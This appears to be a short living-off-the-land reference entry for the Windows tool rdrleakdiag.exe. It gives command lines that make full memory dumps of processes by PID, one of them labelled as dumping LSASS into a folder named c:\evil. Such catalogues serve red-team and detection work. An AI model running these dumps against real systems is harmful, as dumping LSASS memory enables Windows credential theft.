Microsoft Windows resource leak diagnostic tool
Dump process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
rdrleakdiag.exe /p 940 /o c:\evil /fullmemdmp /wait 1
Dump LSASS process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /wait 1
After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /snap